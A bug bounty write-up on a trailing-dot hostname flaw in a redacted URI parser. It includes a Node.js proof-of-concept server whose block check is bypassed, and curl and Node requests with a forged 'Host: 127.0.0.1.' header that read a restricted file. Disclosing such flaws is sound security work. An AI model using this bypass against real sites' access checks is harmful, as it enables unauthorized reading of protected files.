Abusing URI Parsers for fun and profit

This is a write-up about a security issue I found in one of the well-known URI parsers.

Since this was my first discovery in a framework, and since I believe this issue can be found in many different URI parsers, many websites using any sort of URL parser will still be affected; issues like this often lead to high-severity bugs. That is why I am disclosing the finding in this write-up. To respect the company's terms and policies, I have redacted their name and the parser's name.

It had been a long time since I had opened my PC to hunt for security vulnerabilities. I requested invites through Bugcrowd Support, which resulted in an invitation from a company whose scope was limited to reviewing code on GitHub. I didn't have any experience testing for issues that way, but while checking it out, I thought: let's try something new.

Scrolling down the scope items, I found a target like this:

`https://github.com/someName-Of-uri-parser`.

Some days prior to the invitation, I had done some testing on them, analyzing how these parsers work and how they handle URLs. So I started off my work.

Explanation

Note that, according to the RFC,
https://huntingreads.com
is exactly the same as:
https://huntingreads.com.

Notice the dot at the end.

This is detailed in RFC 1034, which states:

Since a complete domain name ends with the root label, this leads to a printed form which ends in a dot. We use this property to distinguish between:

- a character string which represents a complete domain name (often called "absolute"). For example, "poneria.ISI.EDU."

- a character string that represents the starting labels of a domain name which is incomplete, and should be completed by local software using knowledge of the local domain (often called "relative"). For example, "poneria" used in the ISI.EDU domain.

(from RFC 1034)
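To see this equivalence in practice, here is a minimal Node.js sketch (my own illustration, not the redacted parser) showing that the system resolver treats both forms as the same absolute name; example.com is just a stand-in domain:

const dns = require('dns').promises;

// Look up the relative-looking form and the absolute (trailing-dot) form.
// Per RFC 1034, both name the same host, so both return the same address.
async function compareForms() {
    const plain = await dns.lookup('example.com');
    const dotted = await dns.lookup('example.com.');
    console.log(plain.address, dotted.address);
}

compareForms();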

Building the Exploit

With this in mind, I passed different URL pairs to the framework's comparison function:

redacted.isequal("https://abc.com", "https://abc.com.")
false

redacted.isequal("https://abc.com", "https://ABC.COM.")
false

redacted.isequal("https://abc.com:80", "https://ABC.COM:.")
false

redacted.isequal("https://abc.com:80", "https://ABC.COM.")
false

redacted.isequal("https://abc.com:443", "https://ABC.COM.")
false
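For contrast, here is a rough sketch of a comparison that honors the RFC behavior, written with Node's built-in WHATWG URL class. This is my own hypothetical helper, not the redacted parser's API: URL parsing already lowercases the hostname and drops the scheme's default port (443 for https), so we only strip the trailing root-label dot ourselves.

const { URL } = require('url');

// Hypothetical normalization: compare scheme, host (minus trailing dot),
// port, and path after WHATWG URL parsing.
function isEquivalent(a, b) {
    const ua = new URL(a);
    const ub = new URL(b);
    const host = (u) => u.hostname.replace(/\.$/, '');
    return ua.protocol === ub.protocol &&
           host(ua) === host(ub) &&
           ua.port === ub.port &&
           ua.pathname === ub.pathname;
}

console.log(isEquivalent("https://abc.com", "https://abc.com."));     // true
console.log(isEquivalent("https://abc.com", "https://ABC.COM."));     // true
console.log(isEquivalent("https://abc.com:443", "https://ABC.COM.")); // true

(The :80 pairs above would still compare unequal here, which is arguably correct: port 80 is not the https default.)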

Noticing this behavior, I sent a report describing how this can go wrong if websites rely on the parser for any critical/sensitive logic. However, they replied:

Hey Mohammad_Owais,
Thanks for your report. Interesting find.
While it looks like your finding is valid, please provide a security PoC that verifies your theoretical impact.
Thanks,
Redacted

The main focus for any security researcher or bug bounty hunter is to demonstrate impact by proving it, so I wrote some code as my PoC, which runs with Node.js.

Demonstration Code

var http = require('http');
var fs = require('fs');
const redacted = require("redacted-parser");

// create an HTTP server
http.createServer(function (req, res) {
    var host = req.headers.host;
    var fullURL = "http://" + host + req.url;
    // block requests for the sensitive file
    if (redacted.isequal(fullURL, "http://127.0.0.1/some-sensitive-file.txt") === true) {
        console.log("This page is forbidden!");
        console.log(fullURL);
        return res.end();
    } else {
        // for other URLs, try responding with the page
        console.log(req.url);
        console.log(fullURL);
        // read the requested file (path without the leading slash)
        fs.readFile(req.url.substring(1),
            function (err, data) {
                if (err) {
                    res.writeHead(404);
                    return res.end();
                }
                res.writeHead(200);
                res.write(data.toString('utf8'));
                return res.end();
            });
    }
}).listen(80);

What this code does is check whether a user requests the “http://127.0.0.1/some-sensitive-file.txt” endpoint; if they do, it restricts them from reading its contents, otherwise it serves the contents of the requested path normally. [There are many different ways this pattern can go wrong, but I chose this example to demonstrate the impact.]

From the above, we can conclude that something like “curl http://127.0.0.1./readableFile.txt” will return the contents of readableFile.txt, but the server will log the forbidden message if some-sensitive-file.txt is requested.

[Image: example showing the path is restricted]

Due to the issue, we can still read its contents if we append a dot to the host value. A simple curl request won't work on its own, by the way, because curl will generally strip off the trailing dot; we have to force it with an explicit Host header.

So, to read the restricted file, we can do:

curl -v http://127.0.0.1./some-sensitive-file.txt -H "Host: 127.0.0.1."
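If curl keeps normalizing the URL, the same request can also be fired from Node directly; here is a quick hypothetical client for the PoC server above:

const http = require('http');

// Connect to 127.0.0.1, but present the dotted host in the Host header so
// the server builds "http://127.0.0.1./some-sensitive-file.txt" as fullURL,
// which slips past the isequal() check.
http.get({
    host: '127.0.0.1',
    port: 80,
    path: '/some-sensitive-file.txt',
    headers: { 'Host': '127.0.0.1.' }
}, (res) => {
    res.pipe(process.stdout); // prints the "restricted" file's contents
});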

[Image: PoC screenshot]

I also found some other issues in their parsers, which they declined to accept, saying the framework's focus is parsing URIs and not URLs. But I am sure those will be good to know about when testing other websites that rely on these parsers, so I might write about those issues in the near future. For now, I hope you enjoyed reading. 🙂

TIMELINE:

Time-To-Triage -> 2 days

Bounty-Rewarded -> After approximately a month

Reward -> $500

Questions? -> Ask below
